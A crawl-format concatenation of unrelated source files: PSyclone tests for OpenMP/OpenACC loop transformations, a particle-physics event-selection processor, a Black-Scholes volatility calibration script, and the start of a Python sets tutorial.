'my_subroutine' contains accesses to data (variable \"\n \"'not_declared1') that are not present in the Symbol Table(s) \"\n \"within the scope of this routine. Cannot transform such a kernel.\"\n in str(err.value))\n\n\ndef test_omplooptrans_properties():\n ''' Test that the OMPLoopTrans properties assign and return the expected\n values and raise errors when necessary. '''\n\n # Check default values\n omplooptrans = OMPLoopTrans()\n assert omplooptrans.omp_schedule == \"auto\"\n assert omplooptrans.omp_directive == \"do\"\n\n # Use setters with valid values\n omplooptrans.omp_schedule = \"dynamic,2\"\n omplooptrans.omp_directive = \"paralleldo\"\n assert omplooptrans.omp_schedule == \"dynamic,2\"\n assert omplooptrans.omp_directive == \"paralleldo\"\n\n # Setting things at the constructor also works\n omplooptrans = OMPLoopTrans(omp_schedule=\"dynamic,2\",\n omp_directive=\"loop\")\n assert omplooptrans.omp_schedule == \"dynamic,2\"\n assert omplooptrans.omp_directive == \"loop\"\n\n # Use setters with invalid values\n with pytest.raises(TypeError) as err:\n omplooptrans.omp_directive = \"invalid\"\n assert (\"The OMPLoopTrans.omp_directive property must be a str with \"\n \"the value of ['do', 'paralleldo', 'teamsdistributeparalleldo', \"\n \"'loop'] but found a 'str' with value 'invalid'.\"\n in str(err.value))\n\n with pytest.raises(TypeError) as err:\n omplooptrans.omp_schedule = 3\n assert (\"The OMPLoopTrans.omp_schedule property must be a 'str' but\"\n \" found a 'int'.\" in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"invalid\"\n assert (\"Valid OpenMP schedules are ['runtime', 'static', 'dynamic', \"\n \"'guided', 'auto', 'none'] but got 'invalid'.\" in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"auto,3\"\n assert (\"Cannot specify a chunk size when using an OpenMP schedule \"\n \"of 'auto'.\" in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"dynamic,a\"\n assert (\"Supplied OpenMP schedule 'dynamic,a' has an invalid chunk-size.\"\n in str(err.value))\n\n with pytest.raises(ValueError) as err:\n omplooptrans.omp_schedule = \"dynamic,\"\n assert (\"Supplied OpenMP schedule 'dynamic,' has an invalid chunk-size.\"\n in 
str(err.value))\n\n\ndef test_parallellooptrans_validate_dependencies(fortran_reader):\n ''' Test that the ParallelLoopTrans validation checks for loop-carried\n dependencies. '''\n\n def create_loops(body):\n psyir = fortran_reader.psyir_from_source(f'''\n subroutine my_subroutine()\n integer :: ji, jj, jk, jpkm1, jpjm1, jpim1\n real, dimension(10, 10, 10) :: zwt, zwd, zwi, zws\n real :: total\n {body}\n end subroutine''')\n return psyir.walk(Loop)\n\n # Use OMPLoopTrans as a concrete class of ParallelLoopTrans\n omplooptrans = OMPLoopTrans()\n # Example with a loop-carried dependency in the jk dimension\n loops = create_loops('''\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n zwt(ji,jj,jk) = zwd(ji,jj,jk) - zwi(ji,jj,jk) * &\n zws(ji,jj,jk - 1) / zwt(ji,jj,jk - 1)\n enddo\n enddo\n enddo''')\n\n # Check that the loop cannot be parallelised due to the loop-carried\n # dependency.\n with pytest.raises(TransformationError) as err:\n omplooptrans.validate(loops[0])\n assert (\"Transformation Error: Dependency analysis failed with the \"\n \"following messages:\\nError: The write access to 'zwt(ji,jj,jk)' \"\n \"and to 'zwt(ji,jj,jk - 1)' are dependent and cannot be \"\n \"parallelised\" in str(err.value))\n\n # However, the inner loop can be parallelised because the dependency is\n # just with 'jk' and it is not modified in the inner loops\n omplooptrans.validate(loops[1])\n\n # Reductions also indicate a data dependency that needs to be handled, so\n # we don't permit the parallelisation of the loop (until we support\n # reduction clauses)\n loops = create_loops('''\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n total = total + zwt(ji,jj,jk)\n enddo\n enddo\n enddo''')\n with pytest.raises(TransformationError) as err:\n omplooptrans.validate(loops[0])\n assert (\"Transformation Error: Dependency analysis failed with the \"\n \"following messages:\\nWarning: Variable 'total' is read first, \"\n \"which indicates a reduction.\" in str(err.value))\n\n # Shared scalars are race conditions, but these are accepted because they\n # can be managed with the appropriate clause\n loops = create_loops('''\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n total = zwt(ji,jj,jk)\n enddo\n enddo\n enddo''')\n assert not DependencyTools().can_loop_be_parallelised(loops[0])\n omplooptrans.validate(loops[0])\n\n\ndef test_omplooptrans_apply_firstprivate(fortran_reader, fortran_writer,\n tmpdir):\n ''' Test applying the OMPLoopTrans in cases where a firstprivate\n clause is needed to generate code that is functionally equivalent to the\n original, serial version.'''\n\n # Example with a conditional write and an OMPParallelDoDirective\n psyir = fortran_reader.psyir_from_source('''\n module my_mod\n contains\n subroutine my_subroutine()\n integer :: ji, jj, jk, jpkm1, jpjm1, jpim1, scalar1, scalar2\n real, dimension(10, 10, 10) :: zwt, zwd, zwi, zws\n scalar1 = 1\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n if (.true.) then\n scalar1 = zwt(ji,jj,jk)\n endif\n scalar2 = scalar1 + zwt(ji,jj,jk)\n zws(ji,jj,jk) = scalar2\n enddo\n enddo\n enddo\n end subroutine\n end module my_mod''')\n omplooptrans = OMPParallelLoopTrans()\n loop = psyir.walk(Loop)[0]\n omplooptrans.apply(loop)\n expected = '''\\\n !$omp parallel do default(shared), private(ji,jj,jk,scalar2), \\\nfirstprivate(scalar1), schedule(auto)\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n if (.true.) then\n scalar1 = zwt(ji,jj,jk)\n end if\n scalar2 = scalar1 + zwt(ji,jj,jk)\n zws(ji,jj,jk) = scalar2\n enddo\n enddo\n enddo\n !$omp end parallel do\\n'''\n\n gen = fortran_writer(psyir)\n assert expected in gen\n assert Compile(tmpdir).string_compiles(gen)\n\n\ndef test_omplooptrans_apply_firstprivate_fail(fortran_reader):\n ''' Test applying the OMPLoopTrans in cases where a firstprivate\n clause is needed to generate code functionally equivalent to the\n original serial version.\n\n In some cases the transformation's validation dependency analysis\n reports the firstprivate use as a reduction, which is wrong.\n\n '''\n\n # Example with a read before write and an OMPParallelDirective\n psyir = fortran_reader.psyir_from_source('''\n subroutine my_subroutine()\n integer :: ji, jj, jk, jpkm1, jpjm1, jpim1, scalar1, scalar2\n real, dimension(10, 10, 10) :: zwt, zwd, zwi, zws\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n scalar2 = scalar1 + zwt(ji,jj,jk)\n scalar1 = 3\n zws(ji,jj,jk) = scalar2 + scalar1\n enddo\n enddo\n enddo\n end subroutine''')\n omplooptrans = OMPParallelLoopTrans()\n loop = psyir.walk(Loop)[0]\n try:\n omplooptrans.apply(loop)\n except TransformationError:\n # TODO #598: When this is solved, this test can be removed and the\n # \"force\":True in the previous test can also be removed\n pytest.xfail(reason=\"Issue #598: This example should be a firstprivate\"\n \" but the dependency analysis believes it is a \"\n \"reduction.\")\n\n\ndef test_omplooptrans_apply(sample_psyir, fortran_writer):\n ''' Test OMPLoopTrans works as expected with the different options. '''\n\n # By default it adds an OMPDoDirective with the default 'auto' schedule\n omplooptrans = OMPLoopTrans()\n tree = sample_psyir.copy()\n omplooptrans.apply(tree.walk(Loop)[0])\n assert isinstance(tree.walk(Loop)[0].parent, Schedule)\n assert isinstance(tree.walk(Loop)[0].parent.parent, OMPDoDirective)\n assert tree.walk(Loop)[0].parent.parent._omp_schedule == 'auto'\n\n # The omp_schedule can be changed\n omplooptrans = OMPLoopTrans(omp_schedule=\"dynamic,2\")\n ompparalleltrans = OMPParallelTrans()\n tree = sample_psyir.copy()\n loop1 = tree.walk(Loop)[0]\n omplooptrans.apply(loop1)\n assert isinstance(loop1.parent, Schedule)\n assert isinstance(loop1.parent.parent, OMPDoDirective)\n assert loop1.parent.parent._omp_schedule == 'dynamic,2'\n ompparalleltrans.apply(loop1.parent.parent) # Needed for generation\n\n # The omp_directive can be changed\n omplooptrans = OMPLoopTrans(omp_directive=\"loop\")\n loop2 = tree.walk(Loop, stop_type=Loop)[1]\n omplooptrans.apply(loop2, {'collapse': 2})\n assert isinstance(loop2.parent, Schedule)\n assert isinstance(loop2.parent.parent, OMPLoopDirective)\n ompparalleltrans.apply(loop2.parent.parent) # Needed for generation\n\n # Check that the full resulting code looks like this\n expected = '''\n !$omp parallel default(shared), private(i,j)\n !$omp do schedule(dynamic,2)\n do i = 1, 10, 1\n do j = 1, 10, 1\n a(i,j) = 0\n enddo\n enddo\n !$omp end do\n !$omp end parallel\n !$omp parallel default(shared), private(i,j)\n !$omp loop collapse(2)\n do i = 1, 10, 1\n do j = 1, 10, 1\n a(i,j) = 0\n enddo\n enddo\n !$omp end loop\n !$omp end parallel\\n'''\n\n assert expected in fortran_writer(tree)\n\n\ndef test_ifblock_children_region():\n ''' Check that we reject attempts to transform the conditional part of\n an If statement or to include both the if- and else-clauses in a region\n (without their parent). 
'''\n acct = ACCParallelTrans()\n # Construct a valid IfBlock\n condition = Reference(DataSymbol('condition', BOOLEAN_TYPE))\n ifblock = IfBlock.create(condition, [], [])\n\n # Attempt to put all of the children of the IfBlock into a region. This\n # is an error because the first child is the conditional part of the\n # IfBlock.\n with pytest.raises(TransformationError) as err:\n super(ACCParallelTrans, acct).validate([ifblock.children[0]])\n assert (\"transformation to the immediate children of a Loop/IfBlock \"\n \"unless it is to a single Schedule\" in str(err.value))\n with pytest.raises(TransformationError) as err:\n super(ACCParallelTrans, acct).validate(ifblock.children[1:])\n assert (\" to multiple nodes when one or more is a Schedule. \"\n \"Either target a single Schedule or \" in str(err.value))\n\n\ndef test_regiontrans_wrong_children():\n ''' Check that the validate method raises the expected error if\n passed the wrong children of a Node. (e.g. those representing the\n bounds of a Loop.) '''\n # RegionTrans is abstract so use a concrete sub-class\n rtrans = ACCParallelTrans()\n # Construct a valid Loop in the PSyIR\n parent = Loop()\n parent.addchild(Literal(\"1\", INTEGER_TYPE))\n parent.addchild(Literal(\"10\", INTEGER_TYPE))\n parent.addchild(Literal(\"1\", INTEGER_TYPE))\n parent.addchild(Schedule())\n with pytest.raises(TransformationError) as err:\n RegionTrans.validate(rtrans, parent.children)\n assert (\"Cannot apply a transformation to multiple nodes when one or more \"\n \"is a Schedule\" in str(err.value))\n\n\ndef test_parallelregion_refuse_codeblock():\n ''' Check that ParallelRegionTrans.validate() rejects a loop nest that\n encloses a CodeBlock. We use OMPParallelTrans as ParallelRegionTrans\n is abstract. '''\n otrans = OMPParallelTrans()\n # Construct a valid Loop in the PSyIR with a CodeBlock in its body\n parent = Loop.create(DataSymbol(\"ji\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n Literal(\"10\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n [CodeBlock([], CodeBlock.Structure.STATEMENT,\n None)])\n with pytest.raises(TransformationError) as err:\n otrans.validate([parent])\n assert (\"Nodes of type 'CodeBlock' cannot be enclosed by a \"\n \"OMPParallelTrans transformation\" in str(err.value))\n\n\ndef test_parallellooptrans_refuse_codeblock():\n ''' Check that ParallelLoopTrans.validate() rejects a loop nest that\n encloses a CodeBlock. We have to use OMPParallelLoopTrans as\n ParallelLoopTrans is abstract. 
'''\n otrans = OMPParallelLoopTrans()\n # Construct a valid Loop in the PSyIR with a CodeBlock in its body\n parent = Loop.create(DataSymbol(\"ji\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n Literal(\"10\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n [CodeBlock([], CodeBlock.Structure.STATEMENT,\n None)])\n with pytest.raises(TransformationError) as err:\n otrans.validate(parent)\n assert (\"Nodes of type 'CodeBlock' cannot be enclosed \"\n \"by a OMPParallelLoopTrans transformation\" in str(err.value))\n\n\n# Tests for OMPSingleTrans\ndef test_ompsingle():\n ''' Generic tests for the OMPSingleTrans transformation class '''\n trans = OMPSingleTrans()\n assert trans.name == \"OMPSingleTrans\"\n assert str(trans) == \"Insert an OpenMP Single region\"\n\n assert trans.omp_nowait is False\n trans.omp_nowait = True\n assert trans.omp_nowait is True\n\n\ndef test_ompsingle_invalid_nowait():\n ''' Tests to check OMPSingle rejects invalid attempts\n to pass nowait argument '''\n trans = OMPSingleTrans()\n with pytest.raises(TypeError) as err:\n trans.omp_nowait = \"string\"\n assert (\"Expected nowait to be a bool but got a str\"\n in str(err.value))\n\n\ndef test_ompsingle_nested():\n ''' Tests to check OMPSingle rejects being applied to another OMPSingle '''\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH, \"single_invoke.f90\"),\n api=\"gocean1.0\")\n single = OMPSingleTrans()\n psy = PSyFactory(\"gocean1.0\", distributed_memory=False).\\\n create(invoke_info)\n schedule = psy.invokes.invoke_list[0].schedule\n\n single.apply(schedule[0])\n with pytest.raises(TransformationError) as err:\n single.apply(schedule[0])\n assert (\"Transformation Error: Nodes of type 'OMPSingleDirective' cannot\"\n \" be enclosed by a OMPSingleTrans transformation\"\n in str(err.value))\n\n\n# Tests for OMPMasterTrans\ndef test_ompmaster():\n ''' Generic tests for the OMPMasterTrans transformation class '''\n trans = OMPMasterTrans()\n assert trans.name == \"OMPMasterTrans\"\n assert str(trans) == \"Insert an OpenMP Master region\"\n\n\ndef test_ompmaster_nested():\n '''Tests to check OMPMasterTrans rejects being applied to another\n OMPMasterTrans'''\n\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH, \"single_invoke.f90\"),\n api=\"gocean1.0\")\n master = OMPMasterTrans()\n psy = PSyFactory(\"gocean1.0\", distributed_memory=False).\\\n create(invoke_info)\n schedule = psy.invokes.invoke_list[0].schedule\n\n # Successful transformation test\n node = schedule[0]\n master.apply(node)\n assert isinstance(schedule[0], OMPMasterDirective)\n assert schedule[0].dir_body[0] is node\n with pytest.raises(TransformationError) as err:\n master.apply(schedule[0])\n assert (\"Transformation Error: Nodes of type 'OMPMasterDirective' cannot\"\n \" be enclosed by a OMPMasterTrans transformation\"\n in str(err.value))\n\n\n# Tests for ProfileTrans\n\n\n@pytest.mark.parametrize(\"options\", [None, {\"invalid\": \"invalid\"},\n {\"region_name\": (\"mod\", \"reg\")}])\ndef test_profile_trans_name(options):\n '''Check that providing no option or an option not associated with the\n profile transformation does not result in anything being passed\n into ProfileNode via the name argument and that providing an\n option associated with the profile transformation does result in\n the relevant names being passed into ProfileNode via the name\n argument. 
This is checked by looking at the variables\n '_module_name' and '_region_name' which are set to the name\n argument values if they are provided, otherwise the variables are\n set to None.\n\n '''\n _, invoke = get_invoke(\"1_single_invoke.f90\", \"dynamo0.3\", idx=0)\n schedule = invoke.schedule\n profile_trans = ProfileTrans()\n if options:\n profile_trans.apply(schedule.children, options=options)\n else:\n profile_trans.apply(schedule.children)\n profile_node = schedule[0]\n if options and \"region_name\" in options:\n assert profile_node._module_name == \"mod\"\n assert profile_node._region_name == \"reg\"\n else:\n assert profile_node._module_name is None\n assert profile_node._region_name is None\n\n\n@pytest.mark.parametrize(\"value\", [None, [\"a\", \"b\"], (), (\"a\",),\n (\"a\", \"b\", \"c\"), (\"a\", []), ([], \"a\")])\ndef test_profile_trans_invalid_name(value):\n '''Invalid name supplied to options argument.'''\n profile_trans = ProfileTrans()\n\n # We need to have a schedule as parent, otherwise the node\n # (with no parent) will not be allowed.\n sched = Schedule()\n node = Statement(parent=sched)\n sched.addchild(node)\n with pytest.raises(TransformationError) as excinfo:\n profile_trans.apply(node, options={\"region_name\": value})\n assert (\"User-supplied region name must be a tuple containing \"\n \"two non-empty strings.\" in str(excinfo.value))\n","repo_name":"stfc/PSyclone","sub_path":"src/psyclone/tests/psyir/transformations/transformations_test.py","file_name":"transformations_test.py","file_ext":"py","file_size_in_byte":29370,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"35"} +{"seq_id":"4630609317","text":"# This file illustrates how to implement a processor, realizing the selection\n# steps and outputting histograms and a cutflow with efficiencies.\n# Here we create a very simplified version of the ttbar-to-dilep processor.\n# One can run this processor using\n# 'python3 -m pepper.runproc --debug example_processor.py example_config.json'\n# Above command probably will need a little bit of time before all cuts are\n# applied once. 
This is because a whole chunk of events is processed at once.\n# You can adjust the number of events in a chunk, and thereby the memory\n# usage, by using the --chunksize parameter (the default value is 500000).\n\nimport pepper\nimport awkward as ak\nfrom functools import partial\n\n\n# All processors should inherit from pepper.ProcessorBasicPhysics\nclass Processor(pepper.ProcessorBasicPhysics):\n # We use the ConfigTTbarLL instead of its base Config, to use some of its\n # predefined extras\n config_class = pepper.ConfigTTbarLL\n\n def __init__(self, config, eventdir):\n # Initialize the class, maybe overwrite some config variables and\n # load additional files if needed\n # Can set and modify configuration here as well\n# config[\"histogram_format\"] = \"root\"\n # Need to call parent init to make histograms and such ready\n super().__init__(config, eventdir)\n config[\"histogram_format\"] = \"root\"\n\n # It is not recommended to put anything as a member variable into\n # a Processor because the Processor instance is sent as raw bytes\n # between nodes when running on HTCondor.\n\n def process_selection(self, selector, dsname, is_mc, filler):\n # Implement the selection steps: add cuts, define objects and/or\n # compute event weights\n\n # Add a cut only allowing events according to the golden JSON\n # The good_lumimask method is specified in pepper.ProcessorBasicPhysics\n # It also requires a lumimask to be specified in config\n era = self.get_era(selector.data, is_mc)\n if not is_mc:\n selector.add_cut(\"Lumi\", partial(\n self.good_lumimask, is_mc, dsname))\n\n # Only allow events that pass triggers specified in config\n # This also takes into account a trigger order to avoid triggering\n # the same event if it's in two different data datasets.\n pos_triggers, neg_triggers = pepper.misc.get_trigger_paths_for(\n dsname, is_mc, self.config[\"dataset_trigger_map\"],\n self.config[\"dataset_trigger_order\"])\n selector.add_cut(\"Trigger\", partial(\n self.passing_trigger, pos_triggers, neg_triggers))\n\n if is_mc and self.config[\"year\"] in (\"2016\", \"2017\", \"ul2016pre\",\n \"ul2016post\", \"ul2017\"):\n selector.add_cut(\"L1 prefiring\", self.add_l1_prefiring_weights)\n\n selector.add_cut(\"MET filters\", partial(self.met_filters, is_mc))\n\n # Pick electrons satisfying our criteria\n selector.set_multiple_columns(self.pick_electrons)\n # Pick muons satisfying our criteria\n selector.set_multiple_columns(self.pick_muons)\n\n selector.set_cat(\"channel\",{\"ele\", \"muon\"})\n selector.set_multiple_columns(self.lepton_categories)\n\n # Combine electron and muon to lepton\n selector.set_column(\"Lepton\", partial(self.build_lepton_column, is_mc, selector.rng))\n\n # Only accept events that have one lepton and no extra leptons\n selector.add_cut(\"oneLepton\", self.one_good_lepton)\n\n # Pick photons satisfying our criteria\n selector.set_column(\"Photon\", self.pick_medium_photons)\n\n # Only accept events that have at least one photon\n selector.add_cut(\"atLeastOnePhoton\",self.one_good_photon)\n selector.set_column(\"mlg\",self.mass_lg) \n\n # Pick jets satisfying our criteria\n selector.set_column(\"Jet\", partial(self.build_jet_column, is_mc)) \n selector.set_column(\"bJet\", self.build_bjet_column) \n selector.set_column(\"nbtag\", self.num_btags)\n\n # Only accept events that have at least two jets (the b-jet cut comes later)\n selector.add_cut(\"atLeast2jets\",self.has_jets)\n\n # HEM issue cut\n if (self.config[\"hem_cut_if_ele\"] or self.config[\"hem_cut_if_muon\"]\n or self.config[\"hem_cut_if_jet\"]):\n selector.add_cut(\"HEM cut\", self.hem_cut)\n\n # Build MET column\n smear_met = \"smear_met\" in self.config and self.config[\"smear_met\"]\n variation = self.get_jetmet_nominal_arg()\n selector.set_column(\"OrigJet\", selector.data[\"Jet\"])\n selector.set_column(\n \"MET\", partial(self.build_met_column, is_mc, variation.junc,\n variation.jer if smear_met else None, selector.rng,\n era, variation=variation.met))\n # Only accept events with MET pt more than 20 GeV\n selector.add_cut(\"Req MET\", self.met_requirement)\n selector.add_cut(\"atLeast1bjet\",partial(self.btag_cut, is_mc))\n\n # Build different categories according to the number of jets\n# selector.set_cat(\"jet_btag\", {\"j2+_b0\", \"j2_b1\", \"j3+_b1\", \"j2_b2+\", \"j3+_b2+\"})\n# selector.set_multiple_columns(self.btag_categories)\n\n \n def pick_electrons(self, data):\n ele = data[\"Electron\"]\n\n # We do not want electrons that are between the barrel and the end cap\n # For this, we need the eta of the electron with respect to its\n # supercluster\n sc_eta_abs = abs(ele.eta + ele.deltaEtaSC)\n is_in_transreg = (1.444 < sc_eta_abs) & (sc_eta_abs < 1.566)\n\n # Electron ID, as an example we use the MVA one here\n# has_id = ele.mvaFall17V2Iso_WP90\n has_id = ele.cutBased >= 3\n\n # Finally combine all the requirements\n is_good = (\n has_id\n & (~is_in_transreg)\n & (self.config[\"ele_eta_min\"] < ele.eta)\n & (ele.eta < self.config[\"ele_eta_max\"])\n & (self.config[\"good_ele_pt_min\"] < ele.pt))\n \n veto_id = ele.cutBased >=1\n\n is_veto = (\n veto_id\n & (~is_in_transreg)\n & (self.config[\"ele_eta_min\"] < ele.eta)\n & (ele.eta < self.config[\"ele_eta_max\"])\n & (self.config[\"veto_ele_pt_min\"] < ele.pt))\n\n # Return all electrons that are deemed to be good\n return {\"Electron\": ele[is_good], \"VetoEle\": ele[is_veto]}\n\n def pick_muons(self, data):\n muon = data[\"Muon\"]\n etacuts = (self.config[\"muon_eta_min\"] < muon.eta) & (muon.eta < self.config[\"muon_eta_max\"])\n\n good_id = muon.tightId\n good_iso = muon.pfIsoId > 3\n is_good = (\n good_id\n & good_iso\n & etacuts\n & (self.config[\"good_muon_pt_min\"] < muon.pt))\n \n veto_id = muon.looseId\n veto_iso = muon.pfIsoId > 1\n is_veto = (\n veto_id\n & veto_iso\n & etacuts\n & (self.config[\"veto_muon_pt_min\"] < muon.pt))\n\n return {\"Muon\": muon[is_good], \"VetoMuon\": muon[is_veto]}\n\n def pick_medium_photons(self, data):\n photon = data[\"Photon\"]\n leptons = data[\"Lepton\"]\n has_id = photon.cutBased>1\n pass_psv = (photon.pixelSeed==False)\n\n eta_abs = abs(photon.eta)\n is_in_transreg = (1.4442 < eta_abs) & (eta_abs < 1.566)\n \n etacuts = (abs(photon[\"eta\"])<2.5)\n ptcuts = (photon.pt>15)\n\n has_lepton_close = ak.any(\n photon.metric_table(leptons) < 0.4, axis=2)\n\n is_good = (\n has_id\n\t & (~has_lepton_close)\n & pass_psv\n & etacuts\n & (~is_in_transreg)\n & ptcuts)\n\n return photon[is_good]\n\n def good_jet(self, data):\n \"\"\"Apply some basic jet quality cuts.\"\"\"\n jets = data[\"Jet\"]\n leptons = data[\"Lepton\"]\n photons = data[\"Photon\"]\n\n j_id, j_puId, lep_dist, pho_dist, eta_min, eta_max, pt_min = self.config[[\n \"good_jet_id\", \"good_jet_puId\", \"good_jet_lepton_distance\", \"good_jet_photon_distance\",\n \"good_jet_eta_min\", \"good_jet_eta_max\", \"good_jet_pt_min\"]]\n\n if j_id == \"skip\":\n has_id = True\n elif j_id == \"cut:loose\":\n has_id = jets.isLoose\n # Always False in 2017 and 2018\n elif j_id == \"cut:tight\":\n has_id = jets.isTight\n elif j_id == \"cut:tightlepveto\":\n has_id = jets.isTightLeptonVeto\n else:\n raise pepper.config.ConfigError(\n \"Invalid good_jet_id: {}\".format(j_id))\n\n if j_puId == \"skip\":\n has_puId = True\n elif j_puId == \"cut:loose\":\n has_puId = ak.values_astype(jets[\"puId\"] & 0b100, bool)\n elif j_puId == \"cut:medium\":\n has_puId = ak.values_astype(jets[\"puId\"] & 0b10, bool)\n elif j_puId == \"cut:tight\":\n has_puId = ak.values_astype(jets[\"puId\"] & 0b1, bool)\n else:\n raise pepper.config.ConfigError(\n \"Invalid good_jet_puId: {}\".format(j_puId))\n\n # Only apply PUID if pT < 50 GeV\n has_puId = has_puId | (jets.pt >= 50)\n\n j_pt = jets.pt\n if \"jetfac\" in ak.fields(data):\n jets[\"pt\"] = jets[\"pt\"] * data[\"jetfac\"]\n jets[\"mass\"] = jets[\"mass\"] * data[\"jetfac\"]\n jets = jets[ak.argsort(jets[\"pt\"], ascending=False)]\n\n has_lepton_close = ak.any(\n jets.metric_table(leptons) < lep_dist, axis=2)\n has_photon_close = ak.any(\n jets.metric_table(photons) < pho_dist, axis=2) \n\n return (has_id & has_puId\n & (~has_lepton_close)\n & (~has_photon_close)\n & (eta_min < jets.eta)\n & (jets.eta < eta_max)\n & (pt_min < j_pt))\n \n def build_bjet_column(self,data):\n\n jets = data[\"Jet\"]\n bjets = jets[data[\"Jet\"].btagged]\n\n return bjets\n\n def one_good_muon(self, data):\n return (ak.num(data[\"Muon\"]) == 1) & (ak.num(data[\"VetoMuon\"]) == 1)\n \n def one_good_ele(self, data):\n return (ak.num(data[\"Electron\"]) == 1) & (ak.num(data[\"VetoEle\"]) == 1)\n \n def one_good_lepton(self, data):\n return ((ak.num(data[\"Muon\"]) == 1) & (ak.num(data[\"VetoMuon\"]) == 1)) | ((ak.num(data[\"Electron\"]) == 1) & (ak.num(data[\"VetoEle\"]) == 1))\n\n def one_good_photon(self,data):\n return ak.num(data[\"Photon\"])>0\n \n def num_btags(self, data):\n return ak.num(data['bJet'])\n\n def lepton_categories(self,data):\n \n cat = {}\n nele = ak.num(data['VetoEle'])\n nmuon = ak.num(data['VetoMuon'])\n\n cat['ele'] = (nele==1) & (nmuon==0)\n cat['muon'] = (nele==0) & (nmuon==1)\n\n return cat\n\n def btag_categories(self,data):\n \n cats = {}\n \n num_btagged = data[\"nbtag\"]\n njet = ak.num(data[\"Jet\"])\n\n cats[\"j2+_b0\"] = (num_btagged == 0) & (njet == 2)\n cats[\"j2_b1\"] = (num_btagged == 1) & (njet == 2)\n cats[\"j3+_b1\"] = (num_btagged == 1) & (njet > 2)\n cats[\"j2_b2+\"] = (num_btagged >= 2) & (njet == 2)\n cats[\"j3+_b2+\"] = (num_btagged >= 2) & (njet > 2)\n\n\n return cats\n\n def met_requirement(self, data):\n met = data[\"MET\"].pt\n return met > self.config[\"met_min_met\"]\n\n def mass_lg(self, data):\n \"\"\"Return invariant mass of lepton plus photon\"\"\"\n return (data[\"Lepton\"][:, 0] + data[\"Photon\"][:, 0]).mass\n\n def opposite_sign_lepton_pair(self, data):\n # At this point we only have events with exactly two leptons, but now\n # we want only events where they have opposite charge\n\n # First concatenate the charge of our electron(s) and our muon(s)\n # into one array\n charge = ak.concatenate(\n [data[\"Electron\"].charge, data[\"Muon\"].charge], axis=1)\n\n # Now in this array we can simply compare the first and the second\n # element. Note that this is done on axis 1, axis 0 is always used for\n # event indexing, e.g. you would compare charges from event 0 and 1 if\n # you do charge[0] != charge[1]\n return charge[:, 0] != charge[:, 1]\n\n def lepton_pair(self, data):\n # We only want events with exactly two leptons, thus look at our\n # electron and muon counts and pick events accordingly\n return ak.num(data[\"Electron\"]) + ak.num(data[\"Muon\"]) == 2\n \n","repo_name":"hbecerri/tgamma_singlelep","sub_path":"example/example_processor.py","file_name":"example_processor.py","file_ext":"py","file_size_in_byte":12561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34939011641","text":"import numpy as np\nfrom scipy.optimize import minimize, leastsq\nimport matplotlib.pyplot as plt\nfrom CompFinTutorial.Functions import BS_EuCall_FFT\n\n# the data set must have strike prices in the first column, maturities in the second and prices in the third column!\ndef BS_EuCall_Calibrate (S0, r, data, sigma0, R, N, M):\n # defining function to be minimized\n def loss_function(x):\n T = np.unique(data[:, 1])\n for j in T:\n ind = np.where(data[:, 1] == j)\n K = data[ind, 0] # set corresponding strikes\n v0 = BS_EuCall_FFT(S0, r, sigma=x, T=j, t=0, R=R, N=N, M=M, K=K) # BS_EuCall_FFT now returns prices corresponding to input strike K\n # calculate MSE\n mse = ((data[ind, 2] - v0)**2).mean()\n return mse\n # minimize loss function with respect to sigma\n optSigma = leastsq(loss_function, sigma0)\n return optSigma\n\n\n\n\n# import Data\nprices = np.genfromtxt(\"Data/Dax_CallPrices_Eurex.csv\", delimiter=\";\", skip_header=True, )\n\n# set test parameters\nS0 = 12658\nr = 0.05\nsigma0 = 0.3\nR = 1.1\nN = 2**11\nM = 50\n\nopt = BS_EuCall_Calibrate (S0, r, prices, sigma0, R, N, M)\nprint(opt)\n\nsigma = opt[0]\n\nT = np.unique(prices[:,1])\nfor j in T:\n ind = np.where(prices[:, 1] == j)\n K = prices[ind, 0] # set corresponding strikes\n v0 = BS_EuCall_FFT(S0, r, sigma=sigma, T=j, t=0, R=R, N=N, M=M, K=K)\n obs = prices[ind, 2]\n plt.plot(K[0, :], v0[0, :], \"-\")\nplt.xlabel(\"Strike\")\nplt.ylabel(\"Price\")\nTr = np.round(T, 4)\nplt.plot(prices[:, 0], prices[:, 2], \"x\", color=\"black\")\nplt.legend([\"T=\"+str(Tr[0]), \"T=\"+str(Tr[1]), \"T=\"+str(Tr[2]), \"T=\"+str(Tr[3]), \"T=\"+str(Tr[4])])\nplt.title(\"Calibrated prices vs observed prices BS-model\")\nplt.show()\n\n\n\n\n\n","repo_name":"Simbold/ComputationalFinanceTutorial","sub_path":"Exercise_19.py","file_name":"Exercise_19.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37659034729","text":"students=[\n {\"name\": \"Hermoine\", \"house\": \"gryffindoor\"},\n {\"name\": \"Harry\", \"house\": \"gryffindoor\"},\n {\"name\": \"Ron\", \"house\": \"gryffindoor\"},\n {\"name\": \"draco\", \"house\": \"Slythrin\"},\n {\"name\": \"Padma\", \"house\": \"Ravenclaw\"},\n]\n# what are the unique houses in which they live?\n# keeping in mind that if we loop through the dicts, the houses might repeat themselves \n# to approach this problem we can use \"sets\"\n# but first let's see how it's done without sets\n\n#======================================================\n# houses=[]\n\n# for student in 